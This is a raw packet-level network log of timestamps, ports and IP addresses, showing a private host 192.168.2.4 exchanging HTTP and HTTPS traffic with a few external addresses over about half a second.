Dec 14, 2024 12:56:42.330477953 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.330538988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.330682993 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.330682993 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.331034899 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.331232071 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.331283092 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.331712008 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.331756115 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.331775904 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.331832886 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.332098961 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.332108974 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.332151890 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.332158089 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.332472086 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.332712889 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.332721949 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.334161997 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.334852934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.334862947 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.334916115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.334916115 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.335010052 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.335196972 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.335222960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.335268974 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.335403919 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.335562944 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.335603952 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.337305069 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.337368011 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.338093996 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.338184118 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.338227034 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.338639975 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.338689089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.338762045 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.342359066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.342756033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.343015909 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.346787930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.347121954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.347269058 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.351403952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.351438046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.351618052 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.356096983 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.356122017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.356339931 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.360584974 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.360603094 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.360656977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.360656977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.364875078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.365238905 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.365345955 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.369245052 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.369471073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.369611025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.369689941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.373655081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.373919010 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.373967886 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.374011040 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.374018908 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.375000000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.378350019 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.378406048 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.378415108 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.378515959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.379331112 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.382744074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.383101940 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.383332014 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.383337975 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.387090921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.387301922 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.387445927 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.387552023 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.389853954 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.389861107 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.389880896 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.389940023 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.391707897 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.391772985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.391907930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.392437935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.396091938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.396192074 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.396392107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.396469116 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.400716066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.400732994 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.400837898 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.400837898 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.405459881 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.405858040 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.417790890 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:42.417850971 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:42.436501980 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.497565031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.497585058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.497690916 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.498464108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.498481035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.498610020 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.501951933 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.502129078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.502310038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.505376101 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.505446911 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.505472898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.505897045 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.509222031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.509263039 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.509367943 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.512680054 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.512756109 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.512787104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.512831926 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.518245935 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.518269062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.518331051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.518331051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.519972086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.519989967 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.520052910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.520052910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.522581100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.522859097 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.522948980 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.523075104 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.526041031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.526129007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.526201010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.528810024 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.528901100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.528975010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.529028893 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.532001019 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.532030106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.532080889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.532080889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.535027027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.535115004 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.535218954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.535295963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.537913084 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.538008928 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.538038015 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.538090944 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.542494059 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.542510986 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.542596102 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.544254065 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.544420958 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.544581890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.547138929 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.547297001 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.547326088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.547395945 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.550278902 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.550344944 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.550354958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.550414085 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.553323030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.553427935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.553600073 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.553730011 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.557090044 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.557801008 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.557837009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.557883024 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.559567928 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.559616089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.559639931 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.559683084 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.562657118 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.562674999 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.562747002 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.565562010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.565603971 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.565924883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.565988064 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.568756104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.568917990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.569036961 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.572007895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.572035074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.572055101 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.572105885 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.575094938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.575278044 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.575328112 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.576149940 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.578383923 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.578571081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.578588009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.578663111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.581327915 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.581408024 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.581451893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.581531048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.584505081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.584872007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.585099936 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.587280989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.587296963 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.587327957 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.587356091 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.590207100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.590245008 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.590367079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.590435028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.593272924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.593404055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.593497992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.594446898 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.596328020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.596373081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.596584082 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.596739054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.599400997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.599473953 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.599539995 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.599627972 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.602595091 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.602817059 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.602955103 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.604322910 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.604492903 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.604604006 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.605659962 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.605675936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.605731964 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.605731964 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.608603954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.608829021 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.608848095 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.610346079 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.611711979 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.611737013 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.611778975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.611778975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.689543009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.689563990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.689590931 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.689615965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.690593958 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.690612078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.690658092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.692284107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.692349911 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.692897081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.694669962 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.694858074 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.694895029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.694950104 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.697094917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.697233915 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.697449923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.699414015 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.699490070 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.699615002 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.701759100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.701819897 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.701889038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.704047918 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.704157114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.704183102 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.704282999 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.706345081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.706402063 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.706485033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.707537889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.708496094 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.708553076 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.708652020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.708725929 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.710669994 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.710774899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.710803032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.710855961 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.712924957 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.713027000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.713109016 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.714971066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.715027094 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.715091944 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.715147018 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.717135906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.717230082 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.717262983 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.717739105 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.719280005 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.719332933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.719367027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.719439030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.721407890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.721466064 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.721498013 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.721775055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.723213911 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.723346949 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.723438025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.725322008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.725404024 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.725434065 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.725480080 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.727288008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.727407932 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.727556944 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.729268074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.729413033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.729432106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.729475975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.731210947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.731333017 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.731344938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.731405020 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.733175039 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.733321905 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.733354092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.733992100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.735112906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.735236883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.735332966 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.737133026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.737281084 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.737313032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.737369061 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.738945007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.739089966 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.739337921 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.740807056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.740931988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.741106033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.742769003 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.742852926 CET	49860	80	192.168.2.4	31.41.244.11
